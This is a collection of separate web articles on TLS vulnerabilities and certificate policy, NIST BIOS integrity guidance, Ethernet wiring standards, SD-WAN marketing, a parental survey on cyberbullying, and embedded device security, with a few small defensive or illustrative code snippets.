Following the Edward Snowden revelations of pervasive surveillance, there was a big push to configure web servers to support Perfect Forward Secrecy. For the most part, this is a reconfiguration of the ciphers to prefer those that support Diffie-Hellman Ephemeral (DHE). With perfect forward secrecy, a compromise of the server private key will not allow secured communications to be decrypted.
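As an illustration of what "preferring DHE/ECDHE ciphers" can look like in practice, the Python sketch below builds a server-side TLS context restricted to forward-secret suites. The certificate file names are placeholders, and the exact cipher string should follow current hardening guidance rather than be copied verbatim.

```python
# Sketch: a TLS server context that only offers forward-secret key exchange.
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.crt", "server.key")  # placeholder file names

# Offer only ECDHE/DHE suites: session keys are ephemeral, so a later
# compromise of the server's private key cannot decrypt recorded traffic.
ctx.set_ciphers("ECDHE+AESGCM:DHE+AESGCM:!aNULL:!MD5")
```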
TLS Stack Issues
In 2014, issues were found in all the major TLS stacks, prompting new releases. Apple had the Goto Fail bug, in which the certificate was not properly authenticated, which could lead to a man-in-the-middle (MITM) attack.
GnuTLS, used in products such as Red Hat desktop/server and Debian and Ubuntu Linux distributions, also had an issue with improperly verifying digital certificates as authentic. The vulnerability allows an attacker to impersonate a trusted site and create a certificate that would be accepted by a user.
OpenSSL followed up with a security issue coined Heartbleed. With Heartbleed, an attacker could read the memory of the web server which may reveal the private key or end user passwords or data. XKCD depicted the issue quite nicely.
The NSS crypto library had the BERserk bug, which impacted products using NSS such as Mozilla Firefox and Google Chrome. This vulnerability allows attackers to forge RSA signatures and bypass authentication to SSL-protected websites. Users on a compromised network could reveal passwords or download malware.
Microsoft completed the set by revealing a bug in Schannel, later dubbed WinShock. This vulnerability grants code execution when an application such as Internet Explorer is triggered by a component outside the protected environment. In a client-targeted attack, it is easy to achieve control during normal browser exploitation, which raises its severity.
The good news is that OpenBSD and Google are trying to raise the security of the TLS stacks by preparing their own versions. OpenBSD developed LibreSSL which is a cut-down version of OpenSSL. OpenBSD has tried to simplify by eliminating old code which supports legacy platforms.
Google also announced its version of OpenSSL called BoringSSL. Google is striving to keep SSL boring by deploying HTTPS without bugs.
Google SHA-1 Deprecation
Google advanced the schedule of SHA-1 deprecation. The industry was already working to the policy implemented by Microsoft where the certification authorities (CAs) would stop signing with SHA-1 in 2016 and Windows would stop supporting SHA-1 in 2017. Google supports the policy, but has also decided to provide warning indicators in Chrome as early as 2014 for SHA-1 signed certificates which will expire in 2016 or later. As a result, the CAs advanced communications to certificate customers to accelerate the migration to SHA-2.
Google also announced the POODLE vulnerability. With POODLE, an attacker can downgrade an SSL/TLS session to SSL 3.0. Once SSL 3.0 has been negotiated, a padding oracle attack allows items such as “secure” HTTP cookies or HTTP authorization header contents to be stolen. As a result, SSL 3.0 support was removed from many servers and browsers. In addition, some servers were patched to prevent the fallback to SSL 3.0.
It was later revealed POODLE could also be used against the TLS versions of the protocol. In this case, padding was performed incorrectly in about 10 percent of the web servers. The impacted server vendors then had to release patches to mitigate POODLE.
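The practical mitigation for POODLE is to refuse SSL 3.0 outright (and ideally anything below TLS 1.2) so a downgrade can never be negotiated. A minimal Python sketch of that idea, assuming you control the endpoint configuration:

```python
# Sketch: disallow SSL 3.0 and older TLS versions so a protocol downgrade
# to a POODLE-vulnerable version cannot succeed.
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.options |= ssl.OP_NO_SSLv3                # explicit SSL 3.0 refusal
ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # floor the negotiation at TLS 1.2
```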
To 2015 and Beyond
Early in 2014, Google announced Chrome would start supporting Certificate Transparency (CT) for EV SSL certificates in 2015. As a result, the CAs advanced their schedules and have implemented CT for all new EV SSL certificates. To support existing EV certificates, the CAs have provided these to Google, which will be whitelisted for Chrome. As such, all EV certificates should be publicly logged in 2015.
The public logging will allow monitoring to be developed. Monitoring will provide domain owners the chance to see when an EV certificate has been issued with their domain. Moving forward we will see CT progressed through the IETF and a new RFC released sometime in the future. We may also see CT extended to support DV and OV SSL certificates.
The CA/Browser Forum has implemented a change to the SSL Baseline Requirements to require all CAs to disclose their policy on Certification Authority Authorization (CAA) by April 2015. Implementation of CAA will allow domain owners to specify their CA through DNS or DNSSEC.
Code Signing Baseline Requirements
The CA/Browser Forum has advanced the development of the Code Signing Baseline Requirements. The draft requirements were provided for public review in the fall of 2014. The requirements will be updated and submitted for approval in 2015. The baseline requirements will provide direction to mitigate threats, such as private key protection, identity verification and threat detection.
Certificate Validity limited to 39 months
As of April 1, 2015, the maximum validity period of non-EV SSL certificates will be limited to 39 months as specified in the CA/Browser Forum SSL Baseline Requirements. The Baseline Requirements do allow for some exceptions where 60 month certificates can be issued. The reduction of validity periods will allow certificates with old requirements to expire on a timelier basis which will promote the web server to be upgraded with certificates that meet the latest requirements.
Stop Using Non-Registered Domains
As per the SSL Baseline Requirements, public trusted certificates with non-registered domain names will no longer be issued as of November 1, 2015. Any certificates with non-registered domain names that are still valid must be revoked by October 1, 2016.
Subscribers using these certificates are encouraged to change their systems to support registered domain names. If this is not possible, then consider using a dedicated CA or a service from a CA vendor with private trust. More information can be found in the CA Security Council whitepaper.
With POODLE forcing the elimination of SSL 3.0, and with the known weaknesses of TLS 1.0 and 1.1, the best version of the SSL/TLS protocol to deploy is TLS 1.2. So what’s next? TLS 1.3 is on the horizon.
Hopefully in 2015 we will see the release of TLS 1.3 which will allow browser and server vendors to implement. We will also want to push for TLS 1.3 deployment in order to mitigate an attack against TLS 1.2. | <urn:uuid:e129724f-efbc-4c89-8101-b1f24848163d> | CC-MAIN-2022-40 | https://www.entrust.com/pt/blog/2015/01/2015-looking-back-moving-forward/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00193.warc.gz | en | 0.937536 | 1,413 | 2.578125 | 3 |
The routine is almost universal. Every day, millions of workers turn on their computers, take a second or two for a sip of coffee as their desktop or laptop “boots up,” and then get to work. In those few seconds, the basic input-output system (BIOS) of the computer loads the protocols that actually run the PC — in effect, acting the same as the shot of coffee that helps the worker wake up and start functioning. Pretty simple.
Only when it’s not.
Turns out that the BIOS function is yet another entry point for cybersecurity threats, to the degree that a federal agency has set up a program to deal with the problem and has asked for help from both the public and private sectors. The National Institute of Standards and Technology (NIST) has released the draft of a publication that provides guidance for vendors and security professionals as they work to protect personal computers in start-up mode.
The BIOS program is the first software that runs when a computer is turned on. It initializes the computer hardware before the operating system starts. Potential problems arise because it works at such a low level — before other security protections are in place — that unauthorized changes to the BIOS, either malicious or accidental, can cause a significant security threat.
“Unauthorized changes in the BIOS could allow or be part of a sophisticated, targeted attack on an organization, allowing an attacker to infiltrate an organization’s systems or disrupt their operations,” said Andrew Regenscheid, co-author of the NIST document.
The vulnerability is “an emerging threat area,” he warned, and the potential for harm underscores the importance of detecting changes to the BIOS code and configurations, and why monitoring BIOS integrity is an important element of security.
The NIST draft publication, “BIOS Integrity Measurement Guidelines,” explains the fundamentals of BIOS integrity measurement — a way to determine if the BIOS has been altered — and how to report any changes. The publication provides detailed guidelines for hardware and software vendors that develop products to support secure BIOS integrity measurement mechanisms. It may also be of interest to organizations that are developing deployment strategies for these technologies. The agency is seeking public comment on the publication through Jan. 20.
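At its core, integrity measurement boils down to hashing the firmware image or configuration and comparing the result with a known-good "golden" measurement. The sketch below shows only that comparison step; producing a trustworthy firmware dump and protecting the golden value (for example, with a TPM) are the hard parts and are outside this example. The file names and hash value are hypothetical.

```python
# Minimal illustration of an integrity-measurement check: hash a captured
# firmware image and compare it against a recorded golden measurement.
import hashlib

def measure(image_path: str) -> str:
    with open(image_path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

GOLDEN = "3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b"  # hypothetical

if measure("bios_dump.bin") != GOLDEN:  # hypothetical dump from a measurement tool
    print("BIOS measurement mismatch - do not trust this platform until investigated")
```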
The emergence of the threat was highlighted by Symantec in company blog posts last year, and by NIST, which issued a document in April 2011 that provided manufacturing guidance for computer makers regarding BIOS threats. NIST has functioned as a vehicle to alert both hardware and software makers of cyberthreats and to provide technical guidance to help resolve problems.
Threat Level Viewpoints Differ
From a technical standpoint, launching a BIOS attack is not easy for Internet miscreants bent on spreading malware through computer systems, Symantec and NIST agree. But there is a difference in perspective about the future threat of BIOS attacks.
“The reality is that modern malware creators have not found BIOS attacks to be very attractive because of the diversity in legacy BIOS platforms, which tend to use non-standard proprietary designs,” Gerry Egan, director of Symantec Security Response, told CRM Buyer. “This makes a particular threat only useful against a subset of the community, which is not very attractive to everyday cybercriminals seeking the biggest bang for their buck.”
The knowledge required to create such an attack is arcane and poorly documented, Egan observed.
The infamous Stuxnet malware demonstrated that such obstacles as complexity become irrelevant if the attacker has a focused target and extensive resources, he noted — “so, the issue is real, but thus far not a materially significant one.”
NIST’s effort indicates a greater sense of urgency.
“Attacks on BIOS are relatively complex and must be highly targeted, so they have not been as prevalent as other attacks. Instead, most malware targets either the operating system or application running on a computer,” NIST’s Regenscheid told CRM Buyer.
“Over the years, some manufacturers have been taking steps to improve the security of BIOS, but the industry was not moving as quickly to strong security mechanisms as we would have liked, in part because there wasn’t a perceived need,” he said. “But targets and attacks are changing in response to improvements in operating systems and applications. Without security improvements, I think we will start seeing more attacks on BIOS.”
To some degree, that view is shared by McAfee in its 2012 report on potential cyberthreats.
“Attacking hardware and firmware is not easy, but success there would allow attackers to create persistent malware ‘images’ in network cards, hard drives, and even system BIOS,” the report points out. “We will keenly watch how attackers use these low-level functions for botnet control, perhaps migrating their control functions into graphics processor functions, the BIOS, or the master boot record.”
While computer vendors are ultimately responsible for BIOS security, according to Regenscheid, the entire hardware and software supply chain has a role to play in implementing the BIOS measurement protocol described by NIST.
“These vendors will each be responsible for different critical pieces of the overall BIOS integrity measurement system. And, of course, users and system administrators are responsible for setting up and configuring systems properly so that these mechanisms work as intended,” he said.
The NIST integrity measurement guidance is primarily intended for large organizations — either public or private. “While our documents are focused on computers intended for enterprise environments, we think some of these controls will migrate to consumer-level devices over time,” Regenscheid said.
Industry Reacted Quickly
However, actual invasion-protection mechanisms related to the BIOS at the computer manufacturing stage are not as challenging to implement as the detection and measurement protocols just outlined by NIST. As a result, large organizations have better capabilities to adopt the protocols, so adoption at the consumer level could take some time.
The industry reacted positively to the NIST “BIOS Protection Guidelines” issued in April last year, Regenscheid noted.
“That document helped call attention to this potential vulnerability, and the industry response has been amazing. Within a few months of publication, major computer vendors were already shipping products that were designed to meet the guidelines. I’m hopeful we’ll see a similar adoption of the ‘BIOS Integrity Measurement Guidelines,'” he said.
“I think there’s a role here for both NIST and industry standards groups. The NIST publications identify security requirements and properties that we think are important to have in computer systems to secure the BIOS. But we weren’t trying to design a solution. It’s up to industry and industry standards groups to determine how they will implement products that meet the guidelines,” Regenscheid stressed.
Organizations such as the Unified Extensible Firmware Interface Forum and the Trusted Computing Group will have a significant role in developing the necessary standards and specifications to create “secure and interoperable” solutions, he said. | <urn:uuid:1a269b84-6f36-4f08-bfba-271b8faa7b0d> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/us-cautions-on-boot-up-cyberthreat-74190.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00394.warc.gz | en | 0.944727 | 1,478 | 2.78125 | 3 |
T568A and T568B are the wiring standards that define the pinout (connection order) for terminating twisted-pair network cable in eight-pin modular connector plugs and jacks. These wiring standards are one part of the TIA/EIA-568 telecommunications cabling standards. The American National Standards Institute (ANSI), Telecommunications Industry Association (TIA), and Electronics Industries Alliance (EIA) are in agreement on the use of T568A and B.
Both standards specify the wiring schemes for the connection of twisted-pair copper cable into eight-position RJ45 connectors and jacks for data transmission. The twisted-pair cable is comprised of four wire pairs that provide eight conductors. The pairs feature blue, orange, green and brown colours. Each pair has a solid colour wire and another wire that is the same colour, with white stripes. Once the pairs are untwisted, eight separate wires are available to match the eight pins on a jack or plug.
The T568B Wiring Standard
In commercial environments, the T568B wiring standard is more commonly used for telecommunication installations. However, the 568A assignments are frequently seen in residential applications. Cabling expansions are made according to a network’s current wiring scheme in order for wires to match up and data signals to transmit. Both T568A and T568B wiring standards are straight-through schemes.
The Difference in T568B and T568A Wiring Schemes
The pair-to-pin assignments are different in the T568B and T568A wiring schemes. This difference is easily seen with pin positioning. The green and orange pairs (2 and 3) are switched. Patch cords can be purchased that are pre-wired for T568B or 568A connectivity.
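The full pin assignments make the swap easy to see. Expressed as a simple lookup table, the two schemes differ only on pins 1, 2, 3 and 6:

```python
# Pin-to-conductor assignments for the two wiring schemes.
# Note pins 1, 2, 3 and 6: the orange and green pairs trade places.
T568A = {1: "white/green", 2: "green",  3: "white/orange", 4: "blue",
         5: "white/blue",  6: "orange", 7: "white/brown",  8: "brown"}

T568B = {1: "white/orange", 2: "orange", 3: "white/green", 4: "blue",
         5: "white/blue",   6: "green",  7: "white/brown", 8: "brown"}

swapped = [pin for pin in T568A if T568A[pin] != T568B[pin]]
print(swapped)  # [1, 2, 3, 6]
```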
Comms Express can provide additional information on these factory wired patch cables. | <urn:uuid:8813f393-9e2d-4d14-b8f1-f853f0b78cb6> | CC-MAIN-2022-40 | https://www.comms-express.com/infozone/article/t568a-and-t568b/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00394.warc.gz | en | 0.855034 | 379 | 2.984375 | 3 |
Software defined wide area network (SD-WAN) is a type of computer network that enables bonding of multiple internet access resources – such as DSL, cable, cellular or any other IP transport – to provide reliable high throughput data channels.
SD-WAN abstracts connectivity options – like multiprotocol label switching (MPLS), mobile and broadband – to create a virtual enterprise wide-area network (WAN).
An SD-WAN has a virtual WAN architecture and a software-driven technology. A key element of an SD-WAN is its centralized control, so that network connections, security mechanisms, policies, application flows and general administration are separated from the associated hardware.
For security considerations, data communications between offices are typically transmitted via VPN and funneled through the main office facility. It is critical to have a high-throughput IP tunnel that is reliable for this data connection. If a branch office uses a single DSL, T1 or cable modem connection to communicate with the headquarters office, there may be insufficient throughput and speed – especially for uploading data from the branch office to the main office. Similarly, a single broadband line at the branch office will not provide the adequate up-time that business-critical applications demand.
SD-WAN’s architecture enables a high-speed IP communication framework between a branch office and headquarters – as well as among branch offices – even over large geographic areas. The two devices form a transparent, high-speed data tunnel between them by combining access resources on each side.
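One crude way to picture "combining access resources on each side" is a scheduler that spreads traffic across whichever links are currently healthy, weighted by their capacity. The sketch below is purely illustrative - the link names, capacities and weighting rule are invented, and real SD-WAN products use far more sophisticated per-flow logic.

```python
# Illustrative link-bonding scheduler: pick an uplink for each packet/flow,
# weighted by capacity, skipping links that are currently down.
import random

links = [
    {"name": "dsl",   "capacity_mbps": 20,  "up": True},
    {"name": "cable", "capacity_mbps": 100, "up": True},
    {"name": "lte",   "capacity_mbps": 40,  "up": False},  # failed link is skipped
]

def pick_link(links):
    healthy = [l for l in links if l["up"]]
    weights = [l["capacity_mbps"] for l in healthy]
    return random.choices(healthy, weights=weights, k=1)[0]["name"]

print(pick_link(links))  # mostly "cable", sometimes "dsl", never "lte"
```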
A Wide Area Network (WAN) is simply a computer network that covers a large geographical area – usually encompassing a series of Local Area Networks (LANs). The connections can be telephone systems, leased lines or satellites.
With the proliferation of cloud services based on private and public clouds – as well as services that are heavily dependent on reliable and high-performance applications – businesses are sometimes maxing out the limitations of available WAN services. Although it may be economically feasible to provide high bandwidth internet connectivity to the main office, providing the same speed connections to each branch office is prohibitively expensive. There may be many branch offices and the available internet services might be limited or costly.
A software defined wide area network is a departure from the way a WAN is typically deployed and managed. An SD-WAN is a software-based technology that overlays onto an existing network. With an SD-WAN, the physical network is separate from the logical network. It splits the network from the management plane and disconnects the traffic management and monitoring tasks from the hardware. For instance, traditional WANs can only handle so many incoming connections to multiple cloud platforms. SD-WANs are not limited by the underlying hardware that makes up the network.
SD-WAN technology can provide fast, reliable and relatively inexpensive data connectivity between the main office or data center of business with its branches. Compared to the alternative of using a single and expensive internet line, an SD-WAN can significantly cut WAN expenses. Beyond such cost savings, businesses can get reliable, general internet access for offices through the internet connection at the main office.
Many companies are turning to software defined wide area network technology to solve a wide range of network connectivity and performance issues, and boost their business results. Benefits to organizations include:
SD‐WAN delivers the advantages of a dependable, secure WAN service at internet prices. Broadband is more economical and flexible than expensive carrier-grade MPLS connections that typically have long provisioning times and costly contracts. With SD-WAN technology companies can use all available network connections to their full capacity without maintaining unused backup links.
SD-WAN technology distributes security at the branch level, avoiding the limitations of data having to return to a data center for added security protections such as firewall gateways or domain name system (DNS) enforcement. SD-WANs encrypt WAN traffic as it changes locations. It segments the network, minimizing damage if a breach occurs. SD-WANs can also help IT administrators detect attacks more quickly by letting them monitor the amount and types of traffic on a network. There is added security because SD-WANs allow for the use of virtual private networks (VPNs).
SD-WAN allows businesses to easily add or remove WAN connections – as well as combine cellular and fixed-line connections. Branches become more agile because SD-WANs allows multiple links, devices and services to coexist with the older infrastructure. With SD-WAN technology, the main office can quickly deploy WAN services to a distant site without having to send IT personnel there. Businesses can reduce deployment and configuration times with the more agile SD-WAN technology. In fact, network agility was recently cited as a key reason why business are adopting SD-WANs, according to a recent industry survey.
SD‐WAN makes deploying branch-level WAN services fast and simple. Because SD-WANs are based on a central cloud architecture, businesses find it easy to scale across the many endpoints. Companies can streamline branch infrastructure by inserting network services — whether in the cloud, branch edge or in data centers. IT staff have the ability to globally automate zero-touch deployment with a single management interface. SD-WAN offers services like WAN optimization, so fewer network appliances are needed at each location.
Improve the user experience
Because an SD-WAN uses a central control function to direct traffic across the WAN, it increases application performance and enhances the user experience – along with increased user productivity and reduced IT costs. SD-WANs can provide superior cloud application performance from multiple clouds to multiple end users in multiple locations. If a link fails or degrades, the SD-WAN can dynamically route traffic between dedicated circuits and secure internet connections – without interruptions to essential applications.
Gain better performance
SD-WAN technology uses the internet to create secure, high-performance connections – removing MPLS network backhaul penalties. Business application optimization can be provided cost effectively, while greatly enhancing Software as a Service (SaaS) and other cloud-based services. Also, remote users typically experience less network latency and faster connections when using the cloud/SaaS‐based applications.
Companies are rapidly adopting software defined wide area network technology because of its many operational and financial benefits. In fact, the International Data Corporation (IDC) predicts that the SD-WAN infrastructure market will grow at a 40.4 percent compound annual growth rate, reaching $4.5 billion by 2022.
SD-WANs can solve a major business problem of ensuring reliable internet connectivity. Without robust connectivity, a business may face disruptions caused by link failures, network latency or WAN blackouts. These disruptions can be costly. Gartner estimates network downtime may cost up to $5,600 per minute, or more than $300,000 per hour.
In spite of all the advantages, SD-WAN control and management across multiple locations can still be a significant challenge for businesses with IT resource limitations. Many organizations are turning to third-party SD-WAN providers for SD-WAN management software solutions. One example is the GFI SD-WAN software from SD-WAN vendor, GFI Software.
With GFI SD-WAN, you can combine and manage up to twelve internet connections into a single, ultra-high-speed line through a bonding tunnel. With the overlay tunnel technology of GFI SD-WAN, the application flows can be kept alive even during WAN blackouts or brownouts, providing seamless session continuity.
GFI SD-WAN features include:
- High-speed connectivity from branches to the headquarters/datacenter
- High-speed general internet access at the branch office
- Up to 75 percent cost reduction on monthly internet access fees and a faster return on investment
- Plug-and-play transparent installation and an advanced SD-WAN router gateway
Another feature is GFI Software’s intelligent WAN automation. The overlay tunnels leverage advanced algorithms to monitor, remember, learn and react to a business’ network traffic in real-time and on the packet level. Services such as live video, VOIP, chat applications, file transfers or any other types of specific application flows are mapped onto corresponding overlay tunnels.
Connecting Branch and Central Offices Cost-effectively and Reliably
See how you can take advantage of low-cost transport technologies and carrier diversity to enable fast and reliable connectivity.
Introducing GFI SD-WAN
Watch this short video to see how SD-WAN technology can help you achieve exceptional application performance on your network.
Watch this on-demand webinar to discover how you can use GFI SD-WAN to easily connect central and branch offices and more. | <urn:uuid:c606bd16-c800-4dba-b976-70aa0b564c94> | CC-MAIN-2022-40 | https://www.gfi.com/company/blog/sd-wan | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00394.warc.gz | en | 0.921533 | 1,837 | 3.234375 | 3 |
Bullying used to be depicted as kids being shoved into lockers and coerced out of their lunch money by the older, more popular rulers of the school. Nowadays, the focus on bullying has shifted to those hiding behind computer screens and taunting others in the virtual world. While in-school bullying is on the rise, technology and social media have created alternate avenues for bullies to wreak havoc. Whether bullying is done on school grounds or over the phone, the consequences can be lifelong and even life-ending.
So how many kids are experiencing cyberbullying and how do their parents feel about it? To get a better idea of technology’s role in bullying, we surveyed more than 1,000 parents of children over the age of five and asked about their children’s cyberbullying experiences. Continue reading to see what we learned.
History of Harassment
High school students were bullied the most of any age group, according to their parents. Almost 60 percent of parents with children aged 14 to 18 reported them being bullied, but middle school-age children weren’t far behind. Fifty-six percent of parents with children aged 11 to 13 also reported their kids experienced bullying.
Nearly 83 percent of parents said the bullying happened at school, and 32 percent said it happened on the bus. While the majority of bullying occurred in physical locations, bullying on digital platforms occurred in a wider variety of outlets. Nineteen percent of bullying was through social media, and 11 percent was through text messages.
Online video games, internet sites other than social media, phone calls, and emails were also susceptible to bullying. The scary part of the digital world is that a person doesn’t even need to have an account on social media to be a victim of cyberbullying. The spread of private information and harmful words on social media sites can be saved and spread in the “real world,” eventually making it back to the victims.
How Do Parents Help?
Cyberbullying can make it difficult for parents to intervene or protect their children from becoming digital victims.
Around 59 percent of parents who reported their children being cyberbullied decided to talk to them about how to safely navigate the digital world. Forty-three percent of parents also adjusted the controls on their children’s accounts and blocked the offender. As many social media platforms have received backlash for their failure to act on cyberbullying, it seems it is up to the parents to block or censor their kids’ feeds to minimize bullies’ ability to reach them.
Unfortunately, the issue of failure to intervene is also directed at schools. While schools have some authority over what occurs on school grounds, cyberbullying can take place anywhere and usually occurs off campus. Multiple states have laws allowing schools to punish students involved in cyberbullying, but free speech issues can make it difficult to hold students accountable for off-campus acts. The pushback doesn’t sit well with the majority of parents, though.
Almost 66 percent of parents thought schools should hold kids accountable for off-campus cyberbullying – and their desires are supported by research. Studies have shown that cyberbullying is usually not completely off campus, with social media and internet harassment often being an indicator of in-school bullying. Even if the school doesn’t do anything to intervene, 35 percent of parents said they notified the school about a cyberbullying incident.
With social media playing such a large role in cyberbullying, which platforms put kids most at risk?
Parents were most concerned about Facebook: 51 percent thought the social media network posed the biggest cyberbullying threat. However, recent studies have shown Instagram is taking over in both the number of teen users and the risk of cyberbullying. Less than 13 percent of parents had concerns about Instagram, but a 2017 study by Ditch the Label found more than 2 in 5 people aged 12 to 20 experienced bullying on the platform.
The discrepancy between parental concerns and actual data may be due to parents’ increased presence on Facebook over Instagram. If parents aren’t actively using Instagram, they may be less likely to see the bullying or understand the increased risk.
Tech for Teens
Technology can be both helpful and harmful regarding children’s safety, and development. With numerous pros and cons, there doesn’t seem to be a magic answer for when children should be introduced to technological devices and how much time they should spend on them. However, when children get technology seems to depend on the type of technology.
Kids between the ages of six and 10 were more likely to have tablets compared to every other age group and significantly less likely to have smartphones. Smartphones jumped in popularity for kids aged 11 to 13, with 73 percent of parents reporting their middle school-age children having at least one device each.
While the average age at which kids got their first personal tech device was 9.8 years old, studies have shown cyberbullying is linked to the amount of time spent on social media rather than the age at which kids begin using technology. The more time children spend on social media, the higher their risk for cyberbullying. Parents reported their children spent an average of 1.8 hours a day on their personal devices. For the majority of children 18 and younger, parents had access to their devices. Ninety-six percent of parents with children aged six to 10 had access to their kids’ devices, a number that only dropped to over 82 percent for children aged 14 to 18. Significantly fewer parents with children aged 19 and older said they had access – almost a third, despite their kids being legal adults.
Having access to kids’ devices or limiting their screen time is less about overprotectiveness and more about helping children navigate the harm technology can bring. Even the leader of the technology world, Bill Gates, sets strict rules for his children regarding smartphone use, ultimately banning them until age 14.
Who’s on Which App?
Kids may be getting their own technology at a young age, but when are they creating their own social media accounts? According to parents, around 58 percent of children between the ages of 11 and 13 already had their own social media profiles. Surprisingly, so did 22 percent of kids aged 6 to 10. The top platforms for the youngest age group were Facebook and YouTube. The latter makes sense considering the increasing popularity of children’s video channels on YouTube.
However, a significant portion of parents with kids from all age groups reported their children had Instagram accounts. Remember, Instagram is now considered a playground for cyberbullying, and despite the minimum age requirement of 13 to create an account, over 11 percent of parents with children aged 6 to 10 reported their youngsters used the platform. Of course, every parent is different, and some children may be more prepared for the digital world than others, but here are some tips to consider before allowing your child onto social media.
Time Spent Scrolling
Looking at the amount of time kids spend on social media may not seem like a lot when broken down by day. Children aged 6 to 10 spent an average of 50 minutes a day on social media, while those aged 19 and older spent an average of 72.7 minutes online.
With most movies being over 70 minutes, the amount of time all age groups spend scrolling doesn’t seem like much. But when we take daily averages and extend them over a year, the numbers sound a lot more serious. Over a year, kids aged 6 to 10 spend an average of over 18,000 minutes on social media – that’s enough time to read the “Harry Potter” series nearly five times. Social media isn’t all bad, but limiting the amount of time kids spend on it each day can broaden their horizons to other activities and decrease their risk of being bullied.
Technology to Protect
Bullying is still ever-present on school grounds and is increasingly problematic online, especially on social media. Kids may get access to technology and sign up for social media at younger ages (sometimes even before the minimum age requirement), but our study revealed that parents are continuing to monitor their children’s use. From limiting their time to having access to their accounts, parents seem to be aware of the threats that technology and the internet possess and are working to protect their children as much as they can.
Parents shouldn’t depend on social media companies to step in and police themselves. As an alternative, parental monitoring software can help parents keep track of what their kids do on their phones and manage their activity accordingly. Some parental control tools may be included with your device, and a range of third-party vendors offer easy-to-use dashboards from which parents can filter content. Comparitech has detailed reviews and tutorials on the best parental control apps and software.
We surveyed 1,011 people. To qualify for the survey, people had to report having at least one child over the age of 5. If they had more than one child, respondents were asked to answer the survey based on their experiences with their oldest child.
Respondents were 59.3 percent women and 40.7 percent men. The average age was 42.1 with a standard deviation of 11.
Parts of this project include calculated averages. These were computed to account for outliers. This was done by finding the initial average and the standard deviation. The standard deviation was multiplied by three and added to the initial average. Any data point above this sum was excluded from the calculation of the final average.
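In code, that trimming procedure amounts to the following; the sample responses are made up for illustration.

```python
# The outlier rule described above: compute the initial mean and standard
# deviation, then drop any value more than three standard deviations above
# the mean before re-computing the final average.
from statistics import mean, stdev

def trimmed_average(values):
    cutoff = mean(values) + 3 * stdev(values)
    return mean([v for v in values if v <= cutoff])

daily_minutes = [48, 52, 50, 47, 55, 49, 51, 53, 46, 50,
                 54, 49, 52, 48, 51, 50, 47, 53, 49, 600]  # 600 is an outlier
print(round(trimmed_average(daily_minutes), 1))  # ~50.2 once the outlier is dropped
```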
When asked which social media accounts their children had, respondents were given the choices that appear in the final visualization, as well as the options of Tumblr, “I don’t know what accounts my child has,” and “Other.” These were excluded from the final visual due to low sample sizes. In the visual about which social media platforms posed the biggest risk for cyberbullying, Reddit and “Other” were also choices given to respondents, but they were excluded from our final visualization of the data.
Respondents answered the survey based on their experiences with their oldest children. It’s possible that respondents with multiple children had different or more acute experiences with their other children. Also, this survey is based on parents’ perspectives. Therefore, they may not have knowledge of all their children’s internet activities.
Fair Use Statement
Cyberbullying, like all bullying, is a serious issue that needs to be addressed by parents, kids, school administrators, and communities. Feel free to share this study and start a conversation about what is and isn’t acceptable when interacting through devices and on the internet. Any sharing should be done for noncommercial reuse. | <urn:uuid:2e3f514f-d299-4274-9cfd-b1874736ea2a> | CC-MAIN-2022-40 | https://www.comparitech.com/blog/vpn-privacy/boundless-bullies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00394.warc.gz | en | 0.965222 | 2,782 | 3.5 | 4 |
Today, the IT professional has a plethora of technology tools at his or her disposal. Each of these tools can solve complex problems; whether the focus is security, systems administration, networking, etc., the choices are endless.
Embedded devices are one of the tools that give an organization the ability to solve problems in new and exciting ways. However, embedded devices have very limited computing resources and strict power requirements, so writing the software requires much knowledge of both hardware components and programming.
Embedded devices typically run a single application and are usually completely enclosed by the object they serve. Additionally, embedded devices may or may not be able to connect to the Internet.
Below we have outlined the benefits and vulnerabilities of embedded devices.
Benefits of Embedded Devices
Embedded Devices can provide local data management and data distribution capabilities that are safe, efficient, and secure while also being able to analyze, make decisions, and summarize data for other systems.
With the increase of the Internet of Things (IoT), embedded devices allow companies to increase their performance efficiency through aggregating and simplifying data and then delivering analytics that enable decisions to be made. More importantly, embedded devices can make data readily available whenever it is needed within a system, and via the Internet to a wider environment if need be. As the IoT continues to increase, so will the need to distribute intelligence across various platforms more efficiently, effectively, securely, and in real time.
Vulnerabilities of Embedded Devices
However, with all good things come bad. If your embedded devices are poorly coded and have numerous weaknesses, your whole system could be disrupted or taken over. More often than not, embedded devices are forgotten about, and the patches needed to fix vulnerabilities are put on the backburner, allowing breaches to happen more frequently. Just like any other device, embedded devices can be hacked.
To reduce these vulnerabilities, be sure to strengthen your firewall and malware protection. In addition, you should regularly scan and patch your devices so as not to create an opportunity for a security breach.
Hackers are only getting smarter, and we have people phishing, worms crawling, Trojan horses running, and polymorphic creatures self-replicating all over the Internet. We at Carson Inc. want to protect everything at the same time while also having it readily accessible. We will help you find what matters and control what counts while decreasing the chances of your embedded devices getting hacked.
Carson Inc. Combats Cyber Threats
